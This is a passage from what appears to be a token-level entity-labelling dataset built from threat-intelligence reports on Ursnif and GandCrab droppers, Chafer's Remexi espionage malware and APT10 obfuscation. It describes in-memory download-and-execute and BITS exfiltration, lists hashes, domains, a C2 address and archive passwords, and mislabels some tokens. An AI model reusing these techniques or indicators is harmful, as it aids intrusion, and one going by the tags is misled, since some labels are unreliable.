+the O
+GetMethods() S-TOOL
+call O
+( O
+highlighted O
+in O
+the O
+image O
+in O
+red O
+) O
+. O
+
+The O
+enumerated O
+methods O
+are O
+stored O
+, O
+then O
+a O
+for O
+loop O
+looks O
+first O
+for O
+the O
+method O
+named O
+DownloadString S-TOOL
+( O
+highlighted O
+in O
+blue O
+) O
+. O
+
+If O
+the O
+DownloadString S-TOOL
+method O
+is O
+located O
+it O
+will O
+contact O
+the O
+hard O
+coded O
+C2 S-TOOL
+requesting O
+a O
+file O
+, O
+which O
+is O
+downloaded O
+and O
+then O
+invoked O
+( O
+highlighted O
+in O
+blue O
+) O
+. O
+
+It O
+should O
+be O
+noted O
+that O
+because O
+the O
+requested O
+resource O
+is O
+being O
+stored O
+as O
+a O
+string O
+and O
+executed O
+, O
+this O
+all O
+occurs O
+in O
+memory O
+. O
+
+Additional O
+Analysis O
+of O
+the O
+downloaded O
+string O
+is O
+provided O
+in O
+the O
+Gandcrab S-MAL
+cradle O
+section O
+below O
+. O
+
+The O
+loop O
+then O
+looks O
+for O
+the O
+method O
+name O
+DownloadData S-TOOL
+, O
+and O
+if O
+located O
+will O
+download O
+a O
+resource O
+from O
+a O
+second O
+C2 S-TOOL
+. O
+
+This O
+request O
+is O
+then O
+stored O
+in O
+the O
+CommonApplicationData O
+directory O
+( O
+C:\ProgramData O
+in O
+Vista O
+and O
+later O
+) O
+as O
+the O
+hard O
+coded O
+file O
+name O
+( O
+highlighted O
+in O
+green O
+) O
+. O
+
+The O
+script O
+will O
+utilize O
+the O
+hard O
+coded O
+DCOM S-TOOL
+object O
+C08AFD90-F2A1-11D1-8455-00A0C91F3880 O
+, O
+which O
+is O
+the O
+ClassID O
+for O
+the O
+ShellBrowserWindow S-TOOL
+. O
+
+A O
+previous O
+blog O
+post O
+by O
+enigma0x3 O
+, O
+detailed O
+how O
+this O
+CLSID O
+can O
+be O
+leveraged O
+to O
+instantiate O
+the O
+ShellBrowserWindow S-TOOL
+object O
+and O
+call O
+the O
+ShellExecute S-TOOL
+method O
+, O
+which O
+is O
+the O
+same O
+approach O
+that O
+was O
+taken O
+by O
+the O
+attackers O
+. O
+
+This O
+approach O
+has O
+also O
+been O
+used O
+in O
+different O
+Empire S-TOOL
+modules O
+. O
+
+The O
+payloads O
+that O
+are O
+downloaded O
+in O
+the O
+above O
+steps O
+are O
+then O
+executed O
+on O
+the O
+system O
+. O
+
+The O
+first O
+payload O
+that O
+is O
+downloaded O
+via O
+the O
+DownloadString S-TOOL
+method O
+highlighted O
+above O
+, O
+is O
+a O
+PowerShell S-TOOL
+one-liner O
+that O
+uses O
+an O
+IF O
+statement O
+to O
+evaluate O
+the O
+architecture O
+of O
+the O
+compromised O
+system O
+, O
+and O
+then O
+downloads O
+a O
+additional O
+payload O
+from O
+pastebin.com S-DOM
+. O
+
+This O
+additional O
+payload O
+is O
+then O
+executed O
+in O
+memory O
+. O
+
+The O
+image O
+below O
+depicts O
+the O
+contents O
+of O
+the O
+o402ek2m.php S-FILE
+file O
+. O
+
+It O
+should O
+be O
+noted O
+that O
+the O
+contents O
+of O
+o402ek2m.php S-FILE
+were O
+updated O
+by O
+the O
+attackers O
+to O
+reference O
+different O
+pastebin O
+uploads O
+throughout O
+this O
+campaign O
+. O
+
+Also O
+updated O
+was O
+the O
+function O
+name O
+that O
+is O
+invoked O
+, O
+in O
+the O
+example O
+below O
+it O
+was O
+CJOJFNUWNQKRTLLTMCVDCKFGG O
+, O
+however O
+this O
+was O
+dynamically O
+changed O
+to O
+match O
+the O
+name O
+of O
+the O
+function O
+that O
+would O
+be O
+present O
+in O
+pastebin O
+file O
+that O
+was O
+being O
+downloaded O
+. O
+
+Once O
+the O
+raw O
+contents O
+of O
+the O
+pastebin.com S-DOM
+post O
+were O
+downloaded O
+, O
+that O
+data O
+would O
+also O
+be O
+executed O
+in O
+memory O
+. O
+
+In O
+the O
+variants O
+that O
+were O
+obtained O
+during O
+this O
+campaign O
+the O
+file O
+contained O
+a O
+PowerShell S-TOOL
+script O
+that O
+was O
+approximately O
+2800 O
+lines O
+. O
+
+This O
+PowerShell S-TOOL
+script O
+is O
+a O
+version O
+of O
+the O
+Empire B-TOOL
+Invoke-PSInject E-TOOL
+module O
+, O
+with O
+very O
+few O
+modifications O
+. O
+
+The O
+majority O
+if O
+the O
+modifications O
+are O
+of O
+removing O
+comments O
+and O
+renaming O
+variables O
+. O
+
+The O
+script O
+will O
+take O
+an O
+embedded O
+PE S-TOOL
+file O
+that O
+has O
+been O
+base64 S-ENCR
+encoded O
+and O
+inject O
+that O
+into O
+the O
+current O
+PowerShell S-TOOL
+process O
+. O
+
+The O
+image O
+below O
+is O
+the O
+main O
+function O
+that O
+is O
+being O
+called O
+which O
+in O
+turns O
+calls O
+the O
+function O
+responsible O
+for O
+injecting O
+the O
+embedded B-TOOL
+PE I-TOOL
+file E-TOOL
+. O
+
+The O
+base64 S-ENCR
+encoded O
+PE S-TOOL
+file O
+that O
+can O
+be O
+seen O
+in O
+line O
+2760 O
+of O
+the O
+image O
+above O
+is O
+a O
+GandCrab S-MAL
+Variant O
+. O
+
+This O
+variant O
+( O
+the O
+metadata O
+for O
+which O
+is O
+listed O
+below O
+) O
+is O
+Gandcrab S-MAL
+version O
+5.0.4
+. O
+
+krab5.dll S-FILE
+: O
+0f270db9ab9361e20058b8c6129bf30e S-MD5
+d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 S-SHA2
+, O
+Mon B-TIME
+Oct I-TIME
+29 I-TIME
+17:39:23 I-TIME
+2018 E-TIME
+UTC O
+. O
+krab5.text S-FILE
+: O
+019bc7edf8c2896754fdbdbc2ddae4ec S-MD5
+. O
+krab5.rdata S-FILE
+: O
+d6ed79624f7af19ba90f51379b7f31e4 S-MD5
+. O
+krab5.data S-FILE
+: O
+1ec7b57b01d0c46b628a991555fc90f0 S-MD5
+. O
+krab5.rsrc S-FILE
+: O
+89b7e19270b2a5563c301b84b28e423f S-MD5
+. O
+krab5.reloc S-FILE
+: O
+685c3c775f65bffceccc1598ff7c2e59 S-MD5
+. O
+
+The O
+second O
+payload O
+, O
+downloaded O
+via O
+the O
+DownloadData S-TOOL
+method O
+, O
+is O
+a O
+Ursnif S-MAL
+executable O
+. O
+
+In O
+this O
+instance O
+it O
+is O
+saved O
+to O
+the O
+C:\ProgramData O
+directory O
+with O
+a O
+pseudo O
+random O
+name O
+. O
+
+It O
+should O
+be O
+noted O
+that O
+the O
+file O
+name O
+was O
+changed O
+throughout O
+this O
+campaign O
+. O
+
+Once O
+executed O
+the O
+Ursnif S-MAL
+sample O
+will O
+conduct O
+the O
+typical O
+actions O
+observed O
+in O
+Ursnif S-MAL
+samples O
+, O
+like O
+credential O
+harvesting O
+, O
+gathering O
+system O
+and O
+process O
+information O
+, O
+and O
+deploying O
+additional O
+malware O
+samples O
+. O
+
+The O
+information O
+for O
+this O
+specific O
+sample O
+is O
+listed O
+below O
+. O
+
+However O
+, O
+numerous O
+Ursnif S-MAL
+variants O
+were O
+hosted O
+on O
+the O
+bevendbrec.com S-DOM
+site O
+during O
+this O
+campaign O
+. O
+
+Carbon B-SECTEAM
+Black E-SECTEAM
+was O
+able O
+to O
+discover O
+approximately O
+120 O
+different O
+Ursnif S-MAL
+variants O
+that O
+were O
+being O
+hosted O
+from O
+the O
+domains O
+iscondisth.com S-DOM
+and O
+bevendbrec.com S-DOM
+. O
+irongreen.exe S-FILE
+: O
+404d25e3a18bda19a238f77270837198 S-MD5
+c064f6f047a4e39014a29c8c95526c3fe90d7bcea5ef0b8f21ea306c27713d1f S-SHA2
+, O
+Sun B-TIME
+Dec I-TIME
+18 I-TIME
+11:04:31 I-TIME
+2011 E-TIME
+UTC O
+. O
+irongreen.text S-FILE
+: O
+85aa9117c381eae3d181ab63daab335e S-MD5
+. O
+irongreen.rdata S-FILE
+: O
+3e1c774bc4e0ffc2271075e621aa3f3d S-MD5
+. O
+irongreen.data S-FILE
+: O
+6c389e5e301564f65dcad4811dbded8b S-MD5
+. O
+irongreen.rsrc S-FILE
+: O
+efba623cc62ffd0ccbf7f3fbf6264905 S-MD5
+. O
+irongreen.reloc S-FILE
+: O
+6cf46599a57a6cbc5d18fbb2883620ce S-MD5
+. O
+
+While O
+researching O
+this O
+campaign O
+approximately O
+180 O
+variants O
+were O
+located O
+in O
+the O
+wild O
+. O
+
+Using O
+the O
+VirusTotal B-TOOL
+Graph E-TOOL
+functionality O
+these O
+variants O
+could O
+be O
+organized O
+into O
+several O
+groups O
+that O
+were O
+commonly O
+associated O
+by O
+either O
+metadata O
+or O
+document O
+structures O
+like O
+macros O
+or O
+embedded O
+image O
+files O
+( O
+depicted O
+in O
+the O
+image O
+below O
+) O
+. O
+
+The O
+image O
+below O
+highlights O
+the O
+nodes O
+associated O
+with O
+the O
+samples O
+analyzed O
+in O
+this O
+report O
+. O
+
+The O
+graph O
+can O
+also O
+be O
+viewed O
+in O
+the O
+VTGraph B-TOOL
+Console E-TOOL
+for O
+additional O
+exploration O
+. O
+
+The O
+graph O
+highlights O
+the O
+at O
+least O
+3 O
+different O
+variants O
+of O
+Ursnif S-MAL
+that O
+were O
+being O
+hosted O
+on O
+the O
+bevendbrec.com S-DOM
+site O
+. O
+
+The O
+Ursnif S-MAL
+variants O
+were O
+primarily O
+grouped O
+by O
+C2 S-TOOL
+infrastructure O
+. O
+
+The O
+large O
+grouping O
+on O
+the O
+right O
+of O
+the O
+diagram O
+are O
+direct O
+variants O
+of O
+the O
+sample O
+referenced O
+in O
+this O
+write O
+up O
+. O
+
+Samples O
+in O
+this O
+grouping O
+were O
+all O
+hosted O
+on O
+sites O
+that O
+were O
+called O
+by O
+the O
+second O
+stage O
+. O
+
+The O
+samples O
+had O
+minor O
+changes O
+, O
+and O
+were O
+presumably O
+changed O
+by O
+the O
+attackers O
+to O
+avoid O
+detection O
+by O
+hash O
+. O
+
+Word B-MAL
+Dropper E-MAL
+Variant O
+cc5a14ff026ee593d7d25f213715b73833e6b9cf71091317121a009d5ad7fc36 S-SHA2
+7ce3d9fc86396fac9865607594395e94 S-MD5
+Word B-MAL
+Dropper E-MAL
+Variant O
+28a8d6b8a0cdcb25d098e403cc8b6dcb855cb591f0b54c2e3363b5c580d92b28 S-SHA2
+74c7aed44680100e984251ce2cdbdbc6 S-MD5
+Word B-MAL
+Dropper E-MAL
+Variant O
+facbc2cb089668197ca3968a3433b6f4826430c13f7d1c75b44667307c67dfe3 S-SHA2
+10f308d78adda567d4589803ce18cc9b S-MD5
+Word B-MAL
+Dropper E-MAL
+Variant O
+e714a5147335245c386b105bb7494a8b190b6a737ba28f029561efe48105cd11 S-SHA2
+f279d0f04874327b85221697d99de321 S-MD5
+Word B-MAL
+Dropper E-MAL
+Variant O
+56c46ef3d5bd544fa35f6e336d3be93cf36e72d0273fa1dbc915979f2d883e9d S-SHA2
+bc1b322e7efc19417ab0d0524ccb9ff2 S-MD5
+. O
+
+Ursnif S-MAL
+Variant O
+446ffd272c79554a19b5f4299327fb74b8ff457681d10571caa6eea51ec406b0 S-SHA2
+ea7e1650031c92b7377788f05926034e S-MD5
+Ursnif S-MAL
+Variant O
+42636f3185c9e398958aad272d983c8b8b1409df4ce93f1f8f608e190290f56d S-SHA2
+377cd85d8d68fc58976a123aa151c5e0 S-MD5
+Ursnif S-MAL
+Variant O
+24b2141c1134ef14f33a38c58342b6573940c5460d03a2945fafac36e32e6889 S-SHA2
+b73cbffea8094cfa18b067d9568c53e7 S-MD5
+Ursnif S-MAL
+Variant O
+e53b0a60c238c45019089bdf7f16d5f47b7ba15ca2c918e385c41f0c2076eb52 S-SHA2
+24fe5a6196e32749cd030ab51824cabe S-MD5
+Ursnif S-MAL
+Variant O
+4c8de1713f830819e8354b653fd19a5cafd0bc8fa3145eedf555f24261c874de S-SHA2
+589734cb60aa515599c687539c520049 S-MD5
+. O
+
+GandCrab S-MAL
+Variant O
+d6c53d9341dda1252ada3861898840be4d669abae2b983ab9bf5259b84de7525 S-SHA2
+ce1ee671fe5246a9c40b624ef97e4de1 S-MD5
+GandCrab S-MAL
+Variant O
+aca0b96126c813b0d29d6fbff9175f8ca62ff2ec6eed83bff76a73ae717cfcb8 S-SHA2
+07f955796a252771861c8e0db06b1f01 S-MD5
+GandCrab S-MAL
+Variant O
+8cd45f8c8f2ed0109db6a64f9945f3dcb8a780f65c76aedded7b8af95e6dc7ec S-SHA2
+4fcd0d13ea669a83a749ae5bfb098ca2 S-MD5
+GandCrab S-MAL
+Variant O
+933210a9d19b25e0711ae88eece1ba06bb035a01ab2880cc707ff55bdd3b8dd0 S-SHA2
+8ec87fd3ea777fa8d5160dc957e6683e S-MD5
+GandCrab S-MAL
+Variant O
+e564e87958b3e76bc9bfeb5bed773b7a17f3a82f84872acdbb609aa43a9cd776 S-SHA2
+c7d5077960882259b85c01fd41c49ffd S-MD5
+. O
+
+
+Chafer S-APT
+used O
+Remexi S-MAL
+malware O
+to O
+spy O
+on O
+Iran-based O
+foreign O
+diplomatic O
+entities O
+Throughout O
+the O
+autumn O
+of O
+2018 O
+we O
+analyzed O
+a O
+long-standing O
+(and O
+still O
+active O
+at O
+that O
+time) O
+cyber-espionage O
+campaign O
+that O
+was O
+primarily O
+targeting O
+foreign O
+diplomatic O
+entities O
+based O
+in O
+Iran S-LOC
+. O
+
+The O
+attackers O
+were O
+using O
+an O
+improved O
+version O
+of O
+Remexi S-MAL
+in O
+what O
+the O
+victimology O
+suggests O
+might O
+be O
+a O
+domestic O
+cyber-espionage O
+operation
+. O
+
+This O
+malware O
+has O
+previously O
+been O
+associated O
+with O
+an O
+APT O
+actor O
+that O
+Symantec S-IDTY
+calls O
+Chafer S-APT
+. O
+
+The O
+malware O
+can O
+exfiltrate O
+keystrokes, O
+screenshots, O
+browser-related O
+data O
+like O
+cookies O
+and O
+history, O
+decrypted O
+when O
+possible
+. O
+
+The O
+attackers O
+rely O
+heavily O
+on O
+Microsoft S-IDTY
+technologies O
+on O
+both O
+the O
+client O
+and O
+server O
+sides: O
+the O
+Trojan S-TOOL
+uses O
+standard O
+Windows S-OS
+utilities O
+like O
+Microsoft B-TOOL
+Background I-TOOL
+Intelligent I-TOOL
+Transfer I-TOOL
+Service E-TOOL
+(BITS S-TOOL
+) O
+bitsadmin.exe S-FILE
+to O
+receive O
+commands O
+and O
+exfiltrate O
+data
+. O
+
+Its O
+C2 S-TOOL
+is O
+based O
+on O
+IIS S-TOOL
+using O
+.asp S-FILE
+technology O
+to O
+handle O
+the O
+victims’ O
+HTTP O
+requests
+. O
+
+Remexi S-MAL
+developers O
+use O
+the O
+C S-TOOL
+programming O
+language O
+and O
+GCC S-TOOL
+compiler O
+on O
+Windows S-OS
+in O
+the O
+MinGW S-TOOL
+environment
+. O
+
+They O
+most O
+likely O
+used O
+the O
+Qt B-TOOL
+Creator I-TOOL
+IDE E-TOOL
+in O
+a O
+Windows S-OS
+environment
+. O
+
+The O
+malware O
+utilizes O
+several O
+persistence O
+mechanisms O
+including O
+scheduled O
+tasks, O
+Userinit O
+and O
+Run O
+registry O
+keys O
+in O
+the O
+HKLM S-TOOL
+hive
+. O
+
+XOR S-ENCR
+and O
+RC4 S-ENCR
+encryption O
+is O
+used O
+with O
+quite O
+long O
+unique O
+keys O
+for O
+different O
+samples
+. O
+
+Among O
+all O
+these O
+random O
+keys O
+once O
+the O
+word O
+“salamati” O
+was O
+also O
+used, O
+which O
+means O
+“health” O
+in O
+Farsi S-LOC
+. O
+
+Kaspersky B-SECTEAM
+Lab E-SECTEAM
+products O
+detect O
+the O
+malware O
+described O
+in O
+this O
+report O
+as O
+Trojan.Win32.Remexi S-FILE
+and O
+Trojan.Win32.Agent S-FILE
+. O
+
+This O
+blogpost O
+is O
+based O
+in O
+our O
+original O
+report O
+shared O
+with O
+our O
+APT O
+Intelligence O
+Reporting O
+customers O
+last B-TIME
+November I-TIME
+2018 E-TIME
+. O
+
+The O
+main O
+tool O
+used O
+in O
+this O
+campaign O
+is O
+an O
+updated O
+version O
+of O
+the O
+Remexi S-MAL
+malware, O
+publicly O
+reported O
+by O
+Symantec S-IDTY
+back O
+in O
+2015 S-TIME
+. O
+
+The O
+newest O
+module’s O
+compilation O
+timestamp O
+is O
+March B-TIME
+2018 E-TIME
+. O
+
+The O
+developers O
+used O
+GCC S-TOOL
+compiler O
+on O
+Windows S-OS
+in O
+the O
+MinGW S-TOOL
+environment
+. O
+
+Inside O
+the O
+binaries O
+the O
+compiler O
+left O
+references O
+to O
+the O
+names O
+of O
+the O
+C S-TOOL
+source O
+file O
+modules O
+used: O
+operation_reg.c S-FILE
+, O
+thread_command.c S-FILE
+and O
+thread_upload.c S-FILE
+. O
+
+Like O
+mentioned O
+in O
+modules O
+file O
+names O
+the O
+malware O
+consists O
+of O
+several O
+working O
+threads O
+dedicated O
+to O
+different O
+tasks, O
+including O
+C2 S-TOOL
+command O
+parsing O
+and O
+data O
+exfiltration
+. O
+
+For O
+both O
+the O
+receiving O
+of O
+C2 S-TOOL
+commands O
+and O
+exfiltration, O
+Remexi S-MAL
+uses O
+the O
+Microsoft B-TOOL
+Background I-TOOL
+Intelligent I-TOOL
+Transfer I-TOOL
+Service E-TOOL
+(BITS S-TOOL
+) O
+mechanism O
+to O
+communicate O
+with O
+the O
+C2 S-TOOL
+over O
+HTTP
+. O
+
+So O
+far, O
+our O
+telemetry O
+hasn’t O
+provided O
+any O
+concrete O
+evidence O
+that O
+shows O
+us O
+how O
+the O
+Remexi S-MAL
+malware O
+spread
+. O
+
+However, O
+we O
+think O
+it’s O
+worth O
+mentioning O
+that O
+for O
+one O
+victim O
+we O
+found O
+a O
+correlation O
+between O
+the O
+execution O
+of O
+Remexi´s O
+main O
+module O
+and O
+the O
+execution O
+of O
+an O
+AutoIt S-TOOL
+script O
+compiled O
+as O
+PE S-TOOL
+, O
+which O
+we O
+believe O
+may O
+have O
+dropped O
+the O
+malware
+. O
+
+This O
+dropper O
+used O
+an O
+FTP O
+with O
+hardcoded O
+credentials O
+to O
+receive O
+its O
+payload
+. O
+
+FTP O
+server O
+was O
+not O
+accessible O
+any O
+more O
+at O
+the O
+time O
+of O
+our O
+analysis
+. O
+
+Remexi S-MAL
+boasts O
+features O
+that O
+allow O
+it O
+to O
+gather O
+keystrokes, O
+take O
+screenshots O
+of O
+Windows S-OS
+of O
+interest O
+(as O
+defined O
+in O
+its O
+configuration), O
+steal O
+credentials, O
+logons O
+and O
+the O
+browser O
+history, O
+and O
+execute O
+remote O
+commands
+. O
+
+Encryption O
+consists O
+of O
+XOR S-ENCR
+with O
+a O
+hardcoded O
+key O
+for O
+its O
+configuration O
+and O
+RC4 S-ENCR
+with O
+a O
+predefined O
+password O
+for O
+encrypting O
+the O
+victim’s O
+data
+. O
+
+Remexi S-MAL
+includes O
+different O
+modules O
+that O
+it O
+deploys O
+in O
+its O
+working O
+directory, O
+including O
+configuration O
+decryption O
+and O
+parsing, O
+launching O
+victim O
+activity O
+logging O
+in O
+a O
+separate O
+module, O
+and O
+seven O
+threads O
+for O
+various O
+espionage O
+and O
+auxiliary O
+functions
+. O
+
+The O
+Remexi O
+developers O
+seem O
+to O
+rely O
+on O
+legitimate O
+Microsoft S-IDTY
+utilities, O
+which O
+we O
+enumerate O
+in O
+the O
+table O
+below： O
+extract.exe S-FILE
+Deploys O
+modules O
+from O
+the O
+.cab S-FILE
+file O
+into O
+the O
+working O
+Event O
+Cache O
+directory, O
+bitsadmin.exe S-FILE
+Fetches O
+files O
+from O
+the O
+C2 S-TOOL
+server O
+to O
+parse O
+and O
+execute O
+commands
+. O
+
+Send O
+exfiltrated O
+data, O
+taskkill.exe S-FILE
+Ends O
+working O
+cycle O
+of O
+modules
+. O
+
+Persistence O
+modules O
+are O
+based O
+on O
+scheduled O
+tasks O
+and O
+system O
+registry
+. O
+
+Mechanisms O
+vary O
+for O
+different O
+OS O
+versions
+. O
+
+In O
+the O
+case O
+of O
+old O
+Windows S-OS
+versions O
+like O
+XP S-OS
+, O
+main O
+module O
+events.exe S-FILE
+runs O
+an O
+edited O
+XPTask.vbs S-FILE
+Microsoft S-IDTY
+sample O
+script O
+to O
+create O
+a O
+weekly O
+scheduled O
+task O
+for O
+itself
+. O
+
+For O
+newer O
+operating O
+systems, O
+events.exe S-FILE
+creates O
+task.xml S-FILE
+. O
+
+To O
+decrypt O
+the O
+configuration O
+data, O
+the O
+malware O
+uses O
+XOR S-ENCR
+with O
+25-character O
+keys O
+such O
+as O
+“waEHleblxiQjoxFJQaIMLdHKz” O
+that O
+are O
+different O
+for O
+every O
+sample
+. O
+
+RC4 S-ENCR
+file O
+encryption O
+relies O
+on O
+the O
+Windows S-OS
+32 O
+CryptoAPI S-TOOL
+, O
+using O
+the O
+provided O
+value’s O
+MD5 S-ENCR
+hash O
+as O
+an O
+initial O
+vector
+. O
+
+Among O
+all O
+these O
+random O
+keys O
+once O
+the O
+word O
+“salamati” O
+was O
+also O
+used, O
+which O
+means O
+“health” O
+in O
+Farsi
+. O
+
+Config.ini S-FILE
+is O
+the O
+file O
+where O
+the O
+malware O
+stores O
+its O
+encrypted O
+configuration O
+data.List O
+of O
+files O
+to O
+send O
+to O
+C2 S-TOOL
+using O
+bitsadmin.exe S-FILE
+from O
+the O
+dedicated O
+thread: O
+upLog.txt S-FILE
+, O
+upSCRLog.txt S-FILE
+, O
+upSpecial.txt S-FILE
+, O
+upFile.txt S-FILE
+, O
+upMSLog.txt S-FILE
+. O
+http://108.61.189.174 S-URL
+control O
+server O
+HTTP S-PROT
+URL
+. O
+
+KtJvOXulgibfiHk O
+is O
+the O
+password O
+for O
+uploaded O
+zip O
+archives
+. O
+
+One O
+of O
+the O
+malware O
+threads O
+checks O
+in O
+an O
+infinite O
+loop O
+if O
+the O
+mouse O
+button O
+was O
+pressed O
+and O
+then O
+also O
+increments O
+the O
+integer O
+iterator O
+infinitely
+. O
+
+If O
+the O
+mouse O
+hooking O
+function O
+registers O
+a O
+button O
+hit, O
+it O
+lets O
+the O
+screenshotting O
+thread O
+know O
+about O
+it O
+through O
+a O
+global O
+variable
+. O
+
+After O
+that, O
+it O
+checks O
+if O
+the O
+iterator O
+divided O
+by O
+(captureScreenTimeOut/captureActiveWindowTimeOut) O
+has O
+a O
+remainder O
+of O
+0
+. O
+
+In O
+that O
+case, O
+it O
+takes O
+a O
+screenshot
+. O
+
+events.exe S-FILE
+: O
+b1fa803c19aa9f193b67232c9893ea57574a2055791b3de9f836411ce000ce31 S-SHA2
+, O
+c981273c32b581de824e1fd66a19a281 S-MD5
+, O
+GCC S-TOOL
+compiler O
+in O
+MinGW S-TOOL
+environment O
+version O
+2.24, O
+I386 O
+Windows S-OS
+GUI S-TOOL
+EXE S-TOOL
+. O
+
+After O
+checking O
+that O
+the O
+malware O
+is O
+not O
+already O
+installed O
+, O
+it O
+unpacks O
+HCK.cab S-FILE
+using O
+the O
+Microsoft S-IDTY
+standard O
+utility O
+expand.exe S-FILE
+. O
+
+Splitter.exe S-FILE
+: O
+a77f9e441415dbc8a20ad66d4d00ae606faab370ffaee5604e93ed484983d3ff S-SHA2
+, O
+1ff40e79d673461cd33bd8b68f8bb5b8 S-MD5
+, O
+2017.08.06 B-TIME
+11:32:36 E-TIME
+(GMT), O
+I386 O
+Windows S-OS
+Console S-TOOL
+EXE S-TOOL
+. O
+
+Exfiltration S-ACT
+is O
+done O
+through O
+the O
+bitsadmin.exe S-FILE
+utility
+. O
+
+The O
+BITS S-TOOL
+mechanism O
+has O
+existed O
+since O
+Windows B-OS
+XP E-OS
+up O
+to O
+the O
+current O
+Windows B-OS
+10 E-OS
+versions O
+and O
+was O
+developed O
+to O
+create O
+download/upload O
+jobs, O
+mostly O
+to O
+update O
+the O
+OS O
+itself
+. O
+
+The O
+vast O
+majority O
+of O
+the O
+users O
+targeted O
+by O
+this O
+new O
+variant O
+of O
+Remexi S-MAL
+appear O
+to O
+have O
+Iranian S-LOC
+IP O
+addresses
+. O
+
+Some O
+of O
+these O
+appear O
+to O
+be O
+foreign O
+diplomatic O
+entities O
+based O
+in O
+the O
+country
+. O
+
+The O
+Remexi S-MAL
+malware O
+has O
+been O
+associated O
+with O
+an O
+APT O
+actor O
+called O
+Chafer S-APT
+by O
+Symantec S-IDTY
+. O
+
+One O
+of O
+the O
+human-readable O
+encryption O
+keys O
+used O
+is O
+“salamati”
+. O
+
+This O
+is O
+probably O
+the O
+Latin O
+spelling O
+for O
+the O
+word O
+“health” O
+in O
+Farsi S-LOC
+. O
+
+Among O
+the O
+artifacts O
+related O
+to O
+malware O
+authors, O
+we O
+found O
+in O
+the O
+binaries O
+a O
+.pdb S-FILE
+path O
+containing O
+the O
+Windows S-OS
+user O
+name O
+“Mohamadreza O
+New”
+. O
+
+Interestingly, O
+the O
+FBI S-IDTY
+website O
+for O
+wanted O
+cybercriminals O
+includes O
+two O
+Iranians O
+called O
+Mohammad O
+Reza, O
+although O
+this O
+could O
+be O
+a O
+common O
+name O
+or O
+even O
+a O
+false O
+flag
+. O
+
+Activity O
+of O
+the O
+Chafer S-APT
+APT O
+group O
+has O
+been O
+observed O
+since O
+at O
+least O
+2015 S-TIME
+, O
+but O
+based O
+on O
+things O
+like O
+compilation O
+timestamps O
+and O
+C&C O
+registration, O
+it’s O
+possible O
+they O
+have O
+been O
+active O
+for O
+even O
+longer
+. O
+
+
+Defeating O
+Compiler-Level O
+Obfuscations O
+Used O
+in O
+APT10 S-APT
+Malware O
+. O
+
+The B-SECTEAM
+Carbon I-SECTEAM
+Black I-SECTEAM
+Threat I-SECTEAM
+Analysis I-SECTEAM
+Unit E-SECTEAM
+( O
+TAU S-SECTEAM
+) O
+
+recently O
+analyzed O
+a O
+series O
+of O
+malware O
+samples O
+that O
+utilized O
+compiler-level O
+obfuscations O
+. O
+
+For O
+example O
+, O
+
+opaque O
+predicates O
+were O
+applied O
+to O
+Turla S-APT
+mosquito S-MAL
+and O
+APT10 S-APT
+ANEL S-MAL
+. O
+
+Another O
+obfuscation O
+, O
+
+control O
+flow O
+flattening O
+, O
+
+was O
+applied O
+to O
+APT10 S-APT
+ANEL S-MAL
+and O
+Dharma S-MAL
+ransomware O
+packer O
+. O
+
+ANEL S-MAL
+( O
+also O
+referred O
+to O
+as O
+UpperCut S-MAL
+) O
+
+is O
+a O
+RAT O
+program O
+used O
+by O
+APT10 S-APT
+and O
+observed O
+in O
+Japan S-LOC
+uniquely O
+. O
+
+According O
+to O
+SecureWorks S-SECTEAM
+, O
+
+all O
+ANEL S-MAL
+samples O
+whose O
+version O
+is O
+5.3.0 O
+or O
+later O
+are O
+obfuscated O
+with O
+opaque O
+predicates O
+and O
+control O
+flow O
+flattening O
+. O
+
+Opaque O
+predicate O
+is O
+a O
+programming O
+term O
+that O
+refers O
+to O
+decision O
+making O
+where O
+there O
+is O
+actually O
+only O
+one O
+path O
+. O
+
+For O
+example O
+, O
+
+this O
+can O
+be O
+seen O
+as O
+calculating O
+a O
+value O
+that O
+will O
+always O
+return O
+True O
+. O
+
+Control O
+flow O
+flattening O
+is O
+an O
+obfuscation O
+method O
+where O
+programs O
+do O
+not O
+cleanly O
+flow O
+from O
+beginning O
+to O
+end O
+. O
+
+Instead O
+, O
+
+a O
+switch O
+statement O
+is O
+called O
+in O
+an O
+infinite O
+loop O
+having O
+multiple O
+code O
+blocks O
+each O
+performing O
+operations O
+. O
+
+The O
+obfuscations O
+looked O
+similar O
+to O
+the O
+ones O
+explained O
+in O
+Hex-Rays O
+blog O
+, O
+
+but O
+the O
+introduced O
+IDA B-TOOL
+Pro E-TOOL
+plugin O
+HexRaysDeob S-TOOL
+didn’t O
+work O
+for O
+one O
+of O
+the O
+obfuscated O
+ANEL S-MAL
+samples O
+because O
+the O
+tool O
+was O
+made O
+for O
+another O
+variant O
+of O
+the O
+obfuscation O
+. O
+
+TAU S-SECTEAM
+investigated O
+the O
+ANEL S-MAL
+obfuscation O
+algorithms O
+then O
+modified O
+the O
+HexRaysDeob S-TOOL
+code O
+to O
+defeat O
+the O
+obfuscations O
+. O
+
+After O
+the O
+modification O
+, O
+
+TAU S-SECTEAM
+was O
+able O
+to O
+recover O
+the O
+original O
+code O
+. O
+
+HexRaysDeob S-TOOL
+is O
+an O
+IDA B-TOOL
+Pro E-TOOL
+plugin O
+written O
+by O
+Rolf O
+Rolles O
+to O
+address O
+obfuscation O
+seen O
+in O
+binaries O
+. O
+
+In O
+order O
+to O
+perform O
+the O
+deobfuscation O
+, O
+
+the O
+plugin O
+manipulates O
+the O
+IDA O
+intermediate O
+language O
+called O
+microcode O
+. O
+
+If O
+you O
+aren’t O
+familiar O
+with O
+those O
+structures O
+( O
+e.g O
+, O
+
+microcode O
+data O
+structures O
+, O
+
+maturity O
+level O
+, O
+
+Microcode B-TOOL
+Explorer E-TOOL
+and O
+so O
+on O
+) O
+
+, O
+
+you O
+should O
+read O
+his O
+blog O
+post O
+. O
+
+Rolles O
+also O
+provides O
+an O
+overview O
+of O
+each O
+obfuscation O
+technique O
+in O
+the O
+same O
+post O
+. O
+
+HexRaysDeob S-TOOL
+installs O
+two O
+callbacks O
+when O
+loading O
+: O
+
+optinsn_t S-TOOL
+for O
+defeating O
+opaque O
+predicates O
+( O
+defined O
+as O
+ObfCompilerOptimizer S-TOOL
+) O
+
+
+optblock_t S-TOOL
+for O
+defeating O
+control O
+flow O
+flattening O
+( O
+defined O
+as O
+CFUnflattener S-TIME
+) O
+
+. O
+
+Before O
+continuing O
+, O
+
+it O
+is O
+important O
+to O
+understand O
+Hex-Rays S-TOOL
+maturity O
+levels O
+. O
+
+When O
+a O
+binary O
+is O
+loaded O
+into O
+IDA B-TOOL
+Pro E-TOOL
+, O
+
+the O
+application O
+will O
